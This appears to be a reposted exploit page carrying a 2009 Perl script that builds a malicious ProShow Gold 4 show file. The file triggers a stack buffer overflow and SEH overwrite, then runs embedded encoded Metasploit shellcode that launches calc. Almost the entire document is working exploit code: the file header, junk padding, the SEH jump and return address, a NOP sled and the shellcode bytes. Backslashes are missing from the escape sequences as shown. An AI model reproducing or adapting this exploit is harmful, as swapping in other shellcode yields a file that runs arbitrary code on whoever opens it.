Home / os / win10

proshowGold4_sploit.pl.txt

Posted on 23 August 2009

#
# [+] Vulnerability     : ProShow Gold 4 BOF
# [+] Detected by       : Bkis - http://blog.bkis.com/?p=737
# [*] Sploit coded by   : corelanc0d3r  (corelanc0d3r[at]gmail[dot]com)
# [*] Sploit coded on   : August 20, 2009
# [*] Type              : local
# [*] OS                : Windows
# [*] Product           : Photodex ProShow Gold
# [*] Versions affected : 4.0
# [*] Download link     : http://www.photodex.com/downloads/go_proshowgold
# [*] -------------------------------------------------------------------------
# [*] Method            : SEH - Universal
# [*] Tested on         : Windows XP SP3 En
# [*] Greetz&Tx to      : Saumil/SK
# [*] -------------------------------------------------------------------------
#                                               MMMMM~.
#                                               MMMMM?.
#    MMMMMM8.  .=MMMMMMM.. MMMMMMMM, MMMMMMM8.  MMMMM?. MMMMMMM:   MMMMMMMMMM.
#  MMMMMMMMMM=.MMMMMMMMMMM.MMMMMMMM=MMMMMMMMMM=.MMMMM?7MMMMMMMMMM: MMMMMMMMMMM:
#  MMMMMIMMMMM+MMMMM$MMMMM=MMMMMD$I8MMMMMIMMMMM~MMMMM?MMMMMZMMMMMI.MMMMMZMMMMM:
#  MMMMM==7III~MMMMM=MMMMM=MMMMM$. 8MMMMMZ$$$$$~MMMMM?..MMMMMMMMMI.MMMMM+MMMMM:
#  MMMMM=.     MMMMM=MMMMM=MMMMM7. 8MMMMM?    . MMMMM?NMMMM8MMMMMI.MMMMM+MMMMM:
#  MMMMM=MMMMM+MMMMM=MMMMM=MMMMM7. 8MMMMM?MMMMM:MMMMM?MMMMMIMMMMMO.MMMMM+MMMMM:
#  =MMMMMMMMMZ~MMMMMMMMMM8~MMMMM7. .MMMMMMMMMMO:MMMMM?MMMMMMMMMMMMIMMMMM+MMMMM:
#  .:$MMMMMO7:..+OMMMMMO$=.MMMMM7.  ,IMMMMMMO$~ MMMMM?.?MMMOZMMMMZ~MMMMM+MMMMM:
#     .,,,..      .,,,,.   .,,,,,     ..,,,..   .,,,,.. .,,...,,,. .,,,,..,,,,.
#                                                                   eip hunters
# -----------------------------------------------------------------------------
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
#
print " [+] Preparing payload
";
my $sploitfile="proshowsploit.psh";
my $fileheader="Photodex(R) ProShow(TM) Show File Version=0
".
"proshowVersion=2549
".
"title=Untitled ProShow 1
".
"fileName=proshowsploit.psh
".
"description=''
".
"showAspect=1
".
"showSizeX=16
".
"showSizeY=9
".
"loop=1
".
"loopRestart=1
".
"displaySizeX=704
".
"displaySizeY=528
".
"videoSizeX=720
".
"videoSizeY=480
".
"videoFrameRate=29970
".
"videoBitRate=1120000
".
"videoMuxBitRate=1394400
".
"outputImageSizeX=1024
".
"outputImageSizeY=768
".
"outputQuality=80
".
"toolbarEnable=1
".
"allowQuit=1
".
"allowPlay=1
".
"allowTime=1
".
"allowRestart=1
".
"allowSave=1
".
"allowSaveAll=1
".
"allowPrint=1
".
"allowPrintAll=1
".
"allowCopy=1
".
"allowSaver=1
".
"allowCta=1
".
"ctaLabel=ProShow Info
".
"ctaURL=http://www.photodex.com/
".
"background=1
".
"bgOutlineColor=0
".
"bgSizeMode=1
".
"bgColorizeColor=8421504
".
"waterOpacity=128
".
"waterZoom=10000
".
"waterColorizeColor=8421504
".
"musicVolumeOffset=100
".
"defaultCellVolumeOffset=100
".
"defaultCellFadeIn=100
".
"defaultCellFadeOut=100
".
"defaultMusicVolumeOffset=50
".
"defaultMusicFadeIn=100
".
"defaultMusicFadeOut=100
".
"maxDispWidth=800
".
"maxDispHeight=600
".
"maxRender=1
".
"maxRenderWidth=800
".
"maxRenderHeight=600
".
"randomTransitions=FFFFFFFF:FFFFFFFF:FFFFFFFF:FFFFFFFF:FFFFFFFF:FFFFFFFF:FFFFFFFF:FFFFFFFF:FFFFFFFF:FFFFFFFF
".
"makeFileLocalFolder=c:/
".
"cells=2
".
"cell[0].imageEnable=1
".
"cell[0].nrOfImages=1
".
"cell[0].images[0].image=../../../../../Media Sources/ProShow Gold - Built-In Content/Backgrounds/Abstract_02.jpg";
my $junk = "A" x 6120;
my $nseh = "xebx18x90x90";
my $seh = pack('V',0x01a614ea);
my $nop="x90" x 30;
# windows/exec - 144 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# EXITFUNC=seh, CMD=calc
my $shellcode="xdaxd1xd9x74x24xf4x2bxc9xb1x1exbdx78x41xbf" .
"x6fx58x83xe8xfcx31x68x14x03x68x6cxa3x4ax93" .
"x64x67xb5x6cx74xe3xf0x50xffx8fxffxd0xfex80" .
"x8bx6ex18xd4xd3x50x19x01xa2x1bx2dx5ex34xf2" .
"x7cxa0xaexa6xfaxe0xa5xb1xc3x2bx48xbfx01x40" .
"xa7x84xd1xb3x4cx8ex3cx30x13x54xbfxacxcax1f" .
"xb3x79x98x7fxd7x7cx75xf4xfbxf5x88xe0x8ax56" .
"xafxf2x4fx39x9ex0cx2fx90x84x7bxe9x2cxcex3c" .
"xf9xc7xa0xa0xacx53x28xd1x27x9bx2ax21x5dx0c" .
"x45x52x2bxa8xcaxfaxb3x4fx7exf4x94x50x98x6a" .
"x7bxc3x04x6d";

my $junk2="D" x (2000-length($shellcode));
my $filefooter = "
cell[0].images[0].imageEnable=1
".
"cell[0].images[0].name=Abstract_02
".
"cell[0].images[0].replaceableTemplate=1
".
"cell[0].images[0].sizeMode=1
".
"cell[0].images[0].colorizeColor=8421504
".
"cell[0].images[0].colorizeStrength=10000
".
"cell[0].images[0].outlineColor=16777215
".
"cell[0].images[0].aspectX=4
".
"cell[0].images[0].aspectY=3
".
"cell[0].images[0].videoVolume=100
".
"cell[0].images[0].objectId=1
".
"cell[0].images[0].videoSpeed=100
".
"cell[0].images[0].nrOfKeyframes=2
".
"cell[0].images[0].keyframes[0].timeSegment=1
".
"cell[0].images[0].keyframes[0].attributeMask=-1
".
"cell[0].images[0].keyframes[0].zoomX=10000
".
"cell[0].images[0].keyframes[0].zoomY=10000
".
"cell[0].images[0].keyframes[0].panAccelType=1
".
"cell[0].images[0].keyframes[0].zoomXAccelType=1
".
"cell[0].images[0].keyframes[0].zoomYAccelType=1
".
"cell[0].images[0].keyframes[0].rotationAccelType=1
".
"cell[0].images[0].keyframes[0].motionSmoothness=-1
".
"cell[0].images[0].keyframes[0].lockAR=1
".
"cell[0].images[0].keyframes[0].transparency=0
".
"cell[0].images[0].keyframes[0].colorizeColor=8421504
".
"cell[0].images[0].keyframes[0].colorizeStrength=10000
".
"cell[0].images[0].keyframes[0].shadowOffsetX=70
".
"cell[0].images[0].keyframes[0].shadowOffsetY=70
".
"cell[0].images[0].keyframes[1].timestamp=10000
".
"cell[0].images[0].keyframes[1].timeSegment=3
".
"cell[0].images[0].keyframes[1].segmentTimestamp=10000
".
"cell[0].images[0].keyframes[1].attributeMask=-1
".
"cell[0].images[0].keyframes[1].zoomX=10000
".
"cell[0].images[0].keyframes[1].zoomY=10000
".
"cell[0].images[0].keyframes[1].panAccelType=1
".
"cell[0].images[0].keyframes[1].zoomXAccelType=1
".
"cell[0].images[0].keyframes[1].zoomYAccelType=1
".
"cell[0].images[0].keyframes[1].rotationAccelType=1
".
"cell[0].images[0].keyframes[1].motionSmoothness=-1
".
"cell[0].images[0].keyframes[1].lockAR=1
".
"cell[0].images[0].keyframes[1].transparency=0
".
"cell[0].images[0].keyframes[1].colorizeColor=8421504
".
"cell[0].images[0].keyframes[1].colorizeStrength=10000
".
"cell[0].images[0].keyframes[1].shadowOffsetX=70
".
"cell[0].images[0].keyframes[1].shadowOffsetY=70
".
"cell[0].background=1
".
"cell[0].bgDefault=1
".
"cell[0].bgSizeMode=1
".
"cell[0].bgColorizeColor=8421504
".
"cell[0].sound.useDefault=1
".
"cell[0].sound.volume=100
".
"cell[0].sound.fadeIn=100
".
"cell[0].sound.fadeOut=100
".
"cell[0].sound.async=1
".
"cell[0].sound.musicUseDefault=1
".
"cell[0].sound.musicVolume=50
".
"cell[0].sound.musicFadeIn=100
".
"cell[0].sound.musicFadeOut=100
".
"cell[0].musicVolumeOffset=50
".
"cell[0].time=3000
".
"cell[0].transId=2
".
"cell[0].transTime=3000
".
"cell[0].includeGlobalCaptions=1
".
"cell[1].imageEnable=1
".
"cell[1].nrOfImages=1
".
"cell[1].images[0].image=../../../../../Media Sources/ProShow Gold - Built-In Content/Backgrounds/Abstract_01.jpg
".
"cell[1].images[0].imageEnable=1
".
"cell[1].images[0].name=Abstract_01
".
"cell[1].images[0].replaceableTemplate=1
".
"cell[1].images[0].sizeMode=1
".
"cell[1].images[0].colorizeColor=8421504
".
"cell[1].images[0].colorizeStrength=10000
".
"cell[1].images[0].outlineColor=16777215
".
"cell[1].images[0].aspectX=4
".
"cell[1].images[0].aspectY=3
".
"cell[1].images[0].videoVolume=100
".
"cell[1].images[0].objectId=2
".
"cell[1].images[0].videoSpeed=100
".
"cell[1].images[0].nrOfKeyframes=2
".
"cell[1].images[0].keyframes[0].timeSegment=1
".
"cell[1].images[0].keyframes[0].attributeMask=-1
".
"cell[1].images[0].keyframes[0].zoomX=10000
".
"cell[1].images[0].keyframes[0].zoomY=10000
".
"cell[1].images[0].keyframes[0].panAccelType=1
".
"cell[1].images[0].keyframes[0].zoomXAccelType=1
".
"cell[1].images[0].keyframes[0].zoomYAccelType=1
".
"cell[1].images[0].keyframes[0].rotationAccelType=1
".
"cell[1].images[0].keyframes[0].motionSmoothness=-1
".
"cell[1].images[0].keyframes[0].lockAR=1
".
"cell[1].images[0].keyframes[0].transparency=0
".
"cell[1].images[0].keyframes[0].colorizeColor=8421504
".
"cell[1].images[0].keyframes[0].colorizeStrength=10000
".
"cell[1].images[0].keyframes[0].shadowOffsetX=70
".
"cell[1].images[0].keyframes[0].shadowOffsetY=70
".
"cell[1].images[0].keyframes[1].timestamp=10000
".
"cell[1].images[0].keyframes[1].timeSegment=3
".
"cell[1].images[0].keyframes[1].segmentTimestamp=10000
".
"cell[1].images[0].keyframes[1].attributeMask=-1
".
"cell[1].images[0].keyframes[1].zoomX=10000
".
"cell[1].images[0].keyframes[1].zoomY=10000
".
"cell[1].images[0].keyframes[1].panAccelType=1
".
"cell[1].images[0].keyframes[1].zoomXAccelType=1
".
"cell[1].images[0].keyframes[1].zoomYAccelType=1
".
"cell[1].images[0].keyframes[1].rotationAccelType=1
".
"cell[1].images[0].keyframes[1].motionSmoothness=-1
".
"cell[1].images[0].keyframes[1].lockAR=1
".
"cell[1].images[0].keyframes[1].transparency=0
".
"cell[1].images[0].keyframes[1].colorizeColor=8421504
".
"cell[1].images[0].keyframes[1].colorizeStrength=10000
".
"cell[1].images[0].keyframes[1].shadowOffsetX=70
".
"cell[1].images[0].keyframes[1].shadowOffsetY=70
".
"cell[1].background=1
".
"cell[1].bgDefault=1
".
"cell[1].bgSizeMode=1
".
"cell[1].bgColorizeColor=8421504
".
"cell[1].sound.useDefault=1
".
"cell[1].sound.volume=100
".
"cell[1].sound.fadeIn=100
".
"cell[1].sound.fadeOut=100
".
"cell[1].sound.async=1
".
"cell[1].sound.musicUseDefault=1
".
"cell[1].sound.musicVolume=50
".
"cell[1].sound.musicFadeIn=100
".
"cell[1].sound.musicFadeOut=100
".
"cell[1].musicVolumeOffset=50
".
"cell[1].time=3000
".
"cell[1].transId=2
".
"cell[1].transTime=3000
".
"cell[1].includeGlobalCaptions=1
".
"modifierCount=0
";

my $payload = $fileheader.$junk.$nseh.$seh.$nop.$shellcode.$junk2.$filefooter;

print " [+] Writing payload to file
";
open($FILE,">$sploitfile");
print $FILE $payload;
close($FILE);
print " [+] Exploit file " . $sploitfile . " created
";
print " [+] Wrote " . length($payload) . " bytes
";

 

TOP

Malware :

Exploits :